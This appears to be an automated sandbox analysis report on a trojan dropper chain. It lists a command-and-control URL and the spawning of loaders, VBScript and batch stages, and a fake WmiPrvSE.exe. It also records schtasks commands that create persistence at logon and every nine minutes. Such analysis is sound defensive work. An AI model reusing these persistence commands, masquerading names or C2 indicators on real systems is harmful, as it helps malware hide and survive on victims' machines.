            Source: WmiPrvSE.exe, 00000023.00000002.2792046373.0000000003227000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 00000023.00000002.2792046373.0000000003459000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 00000023.00000002.2792046373.0000000002E81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://a0947291.xsph.ru/1606aca9.php?cucOyHPjcFsCiapNYlxb8AP6pF=a3qL3&vw0E6VKq1Z0QnGVYYOq=dzcegjt&zp
            Source: WmiPrvSE.exe, 0000002C.00000002.3632602400.0000000002959000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 0000002C.00000002.3632602400.0000000002EC3000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 0000002C.00000002.3726045478.000000001BA53000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 0000002C.00000002.3632602400.0000000002BB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://a0947291.xsph.ru/1606aca9.php?n8ux2yA6XyMoklAzV5ek7V=UqOdN8&79de6aec23413a4ab0f953d98ee3ec95=
            Source: WmiPrvSE.exe, 00000029.00000002.3409082832.0000000002E02000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://a0947291.xsph.ruPo
            Source: componentWininto.exe, 00000008.00000002.1737716392.0000000003411000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 00000023.00000002.2792046373.0000000002E81000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 00000026.00000002.3182465620.0000000002DC1000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 00000029.00000002.3409082832.000000000288B000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 0000002C.00000002.3632602400.0000000002959000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: WmiPrvSE.exe, 00000023.00000002.2792046373.0000000003227000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 00000023.00000002.2792046373.0000000003124000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 00000026.00000002.3182465620.0000000003254000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 00000026.00000002.3182465620.0000000003164000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 00000029.00000002.3409082832.0000000002CCB000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 00000029.00000002.3409082832.0000000002FC3000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 0000002C.00000002.3632602400.0000000002C86000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 0000002C.00000002.3632602400.0000000002B95000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cp.sprinthost.ru
            Source: WmiPrvSE.exe, 00000023.00000002.2792046373.0000000003227000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 00000023.00000002.2792046373.0000000003124000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 00000026.00000002.3182465620.0000000003254000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 00000026.00000002.3182465620.00000000034B1000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 00000026.00000002.3182465620.0000000003164000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 00000029.00000002.3409082832.0000000002EDE000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 00000029.00000002.3409082832.0000000002CCB000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 00000029.00000002.3409082832.0000000002FC3000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 0000002C.00000002.3632602400.0000000002C86000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 0000002C.00000002.3632602400.0000000002B95000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cp.sprinthost.ru/auth/login
            Source: WmiPrvSE.exe, 00000023.00000002.2792046373.0000000003227000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 00000023.00000002.2792046373.0000000003124000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 00000026.00000002.3182465620.000000000352E000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 00000026.00000002.3182465620.0000000003254000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 00000026.00000002.3182465620.00000000034B1000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 00000026.00000002.3182465620.0000000003164000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 00000029.00000002.3409082832.0000000002EDE000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 00000029.00000002.3409082832.0000000002CCB000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 00000029.00000002.3409082832.0000000002FC3000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 0000002C.00000002.3632602400.0000000002C86000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 0000002C.00000002.3632602400.0000000002FC5000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 0000002C.00000002.3632602400.0000000002B0E000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 0000002C.00000002.3632602400.0000000002B95000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://index.from.sh/pages/game.html
            Source: C:\msPortRefnetdhcp\componentWininto.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeWindow created: window name: CLIPBRDWNDCLASS
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeWindow created: window name: CLIPBRDWNDCLASS
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeWindow created: window name: CLIPBRDWNDCLASS
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeWindow created: window name: CLIPBRDWNDCLASS

            System Summary

            barindex
            Windows Scripting host queries suspicious COM object (likely to drop second stage)
            Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
            Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
            Source: C:\Windows\System32\wscript.exeCOM Object queried: WBEM Locator HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}
            Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Management and Instrumentation HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}
            Source: C:\Users\user\AppData\Local\Temp\CyberLoader.exeCode function: 3_2_0027718C: __EH_prolog,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,3_2_0027718C
            Source: C:\msPortRefnetdhcp\componentWininto.exeFile created: C:\Windows\ShellComponents\zufsVvjyWcGfJF.exeJump to behavior
            Source: C:\msPortRefnetdhcp\componentWininto.exeFile created: C:\Windows\ShellComponents\e5c7b42f1665e5Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\MVPLoader.exeCode function: 2_2_00007FF7605B21F02_2_00007FF7605B21F0
            Source: C:\Users\user\AppData\Local\Temp\CyberLoader.exeCode function: 3_2_0027857B3_2_0027857B
            Source: C:\Users\user\AppData\Local\Temp\CyberLoader.exeCode function: 3_2_0029D00E3_2_0029D00E
            Source: C:\Users\user\AppData\Local\Temp\CyberLoader.exeCode function: 3_2_0027407E3_2_0027407E
            Source: C:\Users\user\AppData\Local\Temp\CyberLoader.exeCode function: 3_2_002870BF3_2_002870BF
            Source: C:\Users\user\AppData\Local\Temp\CyberLoader.exeCode function: 3_2_002A11943_2_002A1194
            Source: C:\Users\user\AppData\Local\Temp\CyberLoader.exeCode function: 3_2_0027E2A03_2_0027E2A0
            Source: C:\Users\user\AppData\Local\Temp\CyberLoader.exeCode function: 3_2_002732813_2_00273281
            Source: C:\Users\user\AppData\Local\Temp\CyberLoader.exeCode function: 3_2_002902F63_2_002902F6
            Source: C:\Users\user\AppData\Local\Temp\CyberLoader.exeCode function: 3_2_002866463_2_00286646
            Source: C:\Users\user\AppData\Local\Temp\CyberLoader.exeCode function: 3_2_0029473A3_2_0029473A
            Source: C:\Users\user\AppData\Local\Temp\CyberLoader.exeCode function: 3_2_0029070E3_2_0029070E
            Source: C:\Users\user\AppData\Local\Temp\CyberLoader.exeCode function: 3_2_002727E83_2_002727E8
            Source: C:\Users\user\AppData\Local\Temp\CyberLoader.exeCode function: 3_2_002837C13_2_002837C1
            Source: C:\Users\user\AppData\Local\Temp\CyberLoader.exeCode function: 3_2_0027E8A03_2_0027E8A0
            Source: C:\Users\user\AppData\Local\Temp\CyberLoader.exeCode function: 3_2_002949693_2_00294969
            Source: C:\Users\user\AppData\Local\Temp\CyberLoader.exeCode function: 3_2_0027F9683_2_0027F968
            Source: C:\Users\user\AppData\Local\Temp\CyberLoader.exeCode function: 3_2_00283A3C3_2_00283A3C
            Source: C:\Users\user\AppData\Local\Temp\CyberLoader.exeCode function: 3_2_00286A7B3_2_00286A7B
            Source: C:\Users\user\AppData\Local\Temp\CyberLoader.exeCode function: 3_2_0029CB603_2_0029CB60
            Source: C:\Users\user\AppData\Local\Temp\CyberLoader.exeCode function: 3_2_00290B433_2_00290B43
            Source: C:\Users\user\AppData\Local\Temp\CyberLoader.exeCode function: 3_2_00285C773_2_00285C77
            Source: C:\Users\user\AppData\Local\Temp\CyberLoader.exeCode function: 3_2_0027ED143_2_0027ED14
            Source: C:\Users\user\AppData\Local\Temp\CyberLoader.exeCode function: 3_2_00283D6D3_2_00283D6D
            Source: C:\Users\user\AppData\Local\Temp\CyberLoader.exeCode function: 3_2_0028FDFA3_2_0028FDFA
            Source: C:\Users\user\AppData\Local\Temp\CyberLoader.exeCode function: 3_2_0027BE133_2_0027BE13
            Source: C:\Users\user\AppData\Local\Temp\CyberLoader.exeCode function: 3_2_0027DE6C3_2_0027DE6C
            Source: C:\Users\user\AppData\Local\Temp\CyberLoader.exeCode function: 3_2_00275F3C3_2_00275F3C
            Source: C:\Users\user\AppData\Local\Temp\CyberLoader.exeCode function: 3_2_00290F783_2_00290F78
            Source: C:\msPortRefnetdhcp\componentWininto.exeCode function: 8_2_00007FFD9BB0428E8_2_00007FFD9BB0428E
            Source: C:\msPortRefnetdhcp\componentWininto.exeCode function: 8_2_00007FFD9BAE58C08_2_00007FFD9BAE58C0
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeCode function: 38_2_00007FFD9BD81DCD38_2_00007FFD9BD81DCD
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeCode function: 38_2_00007FFD9BAD428E38_2_00007FFD9BAD428E
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeCode function: 38_2_00007FFD9BAB58C038_2_00007FFD9BAB58C0
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeCode function: 41_2_00007FFD9BAF31A641_2_00007FFD9BAF31A6
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeCode function: 41_2_00007FFD9BAE945F41_2_00007FFD9BAE945F
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeCode function: 41_2_00007FFD9BAF4C0241_2_00007FFD9BAF4C02
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeCode function: 41_2_00007FFD9BAF31F141_2_00007FFD9BAF31F1
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeCode function: 41_2_00007FFD9BDBDC5641_2_00007FFD9BDBDC56
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeCode function: 41_2_00007FFD9BDCA81541_2_00007FFD9BDCA815
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeCode function: 41_2_00007FFD9BDBEA0241_2_00007FFD9BDBEA02
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeCode function: 41_2_00007FFD9BDCAF3C41_2_00007FFD9BDCAF3C
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeCode function: 41_2_00007FFD9BAD58C041_2_00007FFD9BAD58C0
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeCode function: 44_2_00007FFD9BAE2D0644_2_00007FFD9BAE2D06
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeCode function: 44_2_00007FFD9BAD945F44_2_00007FFD9BAD945F
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeCode function: 44_2_00007FFD9BAE2D5144_2_00007FFD9BAE2D51
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeCode function: 44_2_00007FFD9BDAEA8144_2_00007FFD9BDAEA81
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeCode function: 44_2_00007FFD9BDADCD144_2_00007FFD9BDADCD1
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeCode function: 44_2_00007FFD9BAE341944_2_00007FFD9BAE3419
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeCode function: 44_2_00007FFD9BAC58C044_2_00007FFD9BAC58C0
            Source: C:\Users\user\AppData\Local\Temp\CyberLoader.exeCode function: String function: 0028E28C appears 35 times
            Source: C:\Users\user\AppData\Local\Temp\CyberLoader.exeCode function: String function: 0028ED00 appears 31 times
            Source: C:\Users\user\AppData\Local\Temp\CyberLoader.exeCode function: String function: 0028E360 appears 52 times
            Source: 4c6fK85tK7.exeStatic PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows
            Source: yberLoad.exe.0.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (GUI) x86-64, for MS Windows
            Source: yberLoad.exe.0.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows
            Source: 4c6fK85tK7.exe, 00000000.00000003.1625661090.0000000002639000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemvploader.exe4 vs 4c6fK85tK7.exe
            Source: 4c6fK85tK7.exe, 00000000.00000003.1625661090.0000000002639000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamelibGLESv2.dll4 vs 4c6fK85tK7.exe
            Source: 4c6fK85tK7.exe, 00000000.00000000.1620317940.0000000000408000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamemvploader.exe4 vs 4c6fK85tK7.exe
            Source: 4c6fK85tK7.exe, 00000000.00000000.1620317940.0000000000408000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamelibGLESv2.dll4 vs 4c6fK85tK7.exe
            Source: 4c6fK85tK7.exeBinary or memory string: OriginalFilenamemvploader.exe4 vs 4c6fK85tK7.exe
            Source: 4c6fK85tK7.exeBinary or memory string: OriginalFilenamelibGLESv2.dll4 vs 4c6fK85tK7.exe
            Source: 4c6fK85tK7.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
            Source: 0.0.4c6fK85tK7.exe.4c4e7f.3.raw.unpack, cgYdKBS4dfIqsoQc3K5.csCryptographic APIs: 'TransformBlock'
            Source: 0.0.4c6fK85tK7.exe.4c4e7f.3.raw.unpack, cgYdKBS4dfIqsoQc3K5.csCryptographic APIs: 'TransformFinalBlock'
            Source: 0.0.4c6fK85tK7.exe.4c4e7f.3.raw.unpack, T0HDoS2uxaHqMCw3CHm.csCryptographic APIs: 'CreateDecryptor'
            Source: 0.0.4c6fK85tK7.exe.4c4e7f.3.raw.unpack, T0HDoS2uxaHqMCw3CHm.csCryptographic APIs: 'CreateDecryptor'
            Source: 0.3.4c6fK85tK7.exe.26e483f.0.raw.unpack, cgYdKBS4dfIqsoQc3K5.csCryptographic APIs: 'TransformBlock'
            Source: 0.3.4c6fK85tK7.exe.26e483f.0.raw.unpack, cgYdKBS4dfIqsoQc3K5.csCryptographic APIs: 'TransformFinalBlock'
            Source: 0.3.4c6fK85tK7.exe.26e483f.0.raw.unpack, T0HDoS2uxaHqMCw3CHm.csCryptographic APIs: 'CreateDecryptor'
            Source: 0.3.4c6fK85tK7.exe.26e483f.0.raw.unpack, T0HDoS2uxaHqMCw3CHm.csCryptographic APIs: 'CreateDecryptor'
            Source: 1.0. yberLoad.exe.4b2617.1.raw.unpack, cgYdKBS4dfIqsoQc3K5.csCryptographic APIs: 'TransformBlock'
            Source: 1.0. yberLoad.exe.4b2617.1.raw.unpack, cgYdKBS4dfIqsoQc3K5.csCryptographic APIs: 'TransformFinalBlock'
            Source: 1.0. yberLoad.exe.4b2617.1.raw.unpack, T0HDoS2uxaHqMCw3CHm.csCryptographic APIs: 'CreateDecryptor'
            Source: 1.0. yberLoad.exe.4b2617.1.raw.unpack, T0HDoS2uxaHqMCw3CHm.csCryptographic APIs: 'CreateDecryptor'
            Source: 0.3.4c6fK85tK7.exe.26e483f.0.raw.unpack, OsAeTLjTbLP5h5sZLNQ.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: 0.3.4c6fK85tK7.exe.26e483f.0.raw.unpack, OsAeTLjTbLP5h5sZLNQ.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 1.3. yberLoad.exe.32cf3ab.1.raw.unpack, OsAeTLjTbLP5h5sZLNQ.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: 1.3. yberLoad.exe.32cf3ab.1.raw.unpack, OsAeTLjTbLP5h5sZLNQ.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 1.0. yberLoad.exe.4b2617.1.raw.unpack, OsAeTLjTbLP5h5sZLNQ.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: 1.0. yberLoad.exe.4b2617.1.raw.unpack, OsAeTLjTbLP5h5sZLNQ.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.0.4c6fK85tK7.exe.4c4e7f.3.raw.unpack, OsAeTLjTbLP5h5sZLNQ.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: 0.0.4c6fK85tK7.exe.4c4e7f.3.raw.unpack, OsAeTLjTbLP5h5sZLNQ.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: classification engineClassification label: mal100.troj.evad.winEXE@60/26@1/1
            Source: C:\Users\user\AppData\Local\Temp\CyberLoader.exeCode function: 3_2_00276EC9 GetLastError,FormatMessageW,3_2_00276EC9
            Source: C:\Users\user\AppData\Local\Temp\CyberLoader.exeCode function: 3_2_00289E1C FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,3_2_00289E1C
            Source: C:\msPortRefnetdhcp\componentWininto.exeFile created: C:\Users\Default User\Downloads\WmiPrvSE.exeJump to behavior
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeMutant created: NULL
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7308:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7996:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:8044:120:WilError_03
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeMutant created: \Sessions\1\BaseNamedObjects\Local\b0b377e1857613aef91ebe71eb29e3cd69a49a7d
            Source: C:\Users\user\Desktop\4c6fK85tK7.exeFile created: C:\Users\user\AppData\Local\Temp\ yberLoad.exeJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\msPortRefnetdhcp\m6JlOKDKnmGOe6a.bat" "
            Source: C:\Users\user\AppData\Local\Temp\CyberLoader.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\msPortRefnetdhcp\file.vbs"
            Source: 4c6fK85tK7.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.94%
            Source: C:\msPortRefnetdhcp\componentWininto.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\msPortRefnetdhcp\componentWininto.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\msPortRefnetdhcp\componentWininto.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\msPortRefnetdhcp\componentWininto.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\msPortRefnetdhcp\componentWininto.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\msPortRefnetdhcp\componentWininto.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\msPortRefnetdhcp\componentWininto.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\msPortRefnetdhcp\componentWininto.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\msPortRefnetdhcp\componentWininto.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
            Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
            Source: C:\Users\Default\Downloads\WmiPrvSE.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
            Source: C:\Users\user\Desktop\4c6fK85tK7.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\4c6fK85tK7.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: 4c6fK85tK7.exeReversingLabs: Detection: 97%
            Source: 4c6fK85tK7.exeVirustotal: Detection: 84%
            Source: unknownProcess created: C:\Users\user\Desktop\4c6fK85tK7.exe "C:\Users\user\Desktop\4c6fK85tK7.exe"
            Source: C:\Users\user\Desktop\4c6fK85tK7.exeProcess created: C:\Users\user\AppData\Local\Temp\ yberLoad.exe "C:\Users\user\AppData\Local\Temp\ yberLoad.exe"
            Source: C:\Users\user\AppData\Local\Temp\ yberLoad.exeProcess created: C:\Users\user\AppData\Local\Temp\MVPLoader.exe "C:\Users\user\AppData\Local\Temp\MVPLoader.exe"
            Source: C:\Users\user\AppData\Local\Temp\ yberLoad.exeProcess created: C:\Users\user\AppData\Local\Temp\CyberLoader.exe "C:\Users\user\AppData\Local\Temp\CyberLoader.exe"
            Source: C:\Users\user\AppData\Local\Temp\CyberLoader.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\msPortRefnetdhcp\zRMFcMzN1094wnGdurNck4fGlt.vbe"
            Source: C:\Users\user\AppData\Local\Temp\CyberLoader.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\msPortRefnetdhcp\file.vbs"
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\msPortRefnetdhcp\m6JlOKDKnmGOe6a.bat" "
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\msPortRefnetdhcp\componentWininto.exe "C:\msPortRefnetdhcp\componentWininto.exe"
            Source: C:\msPortRefnetdhcp\componentWininto.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 9 /tr "'C:\Users\Default User\Downloads\WmiPrvSE.exe'" /f
            Source: C:\msPortRefnetdhcp\componentWininto.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Users\Default User\Downloads\WmiPrvSE.exe'" /rl HIGHEST /f
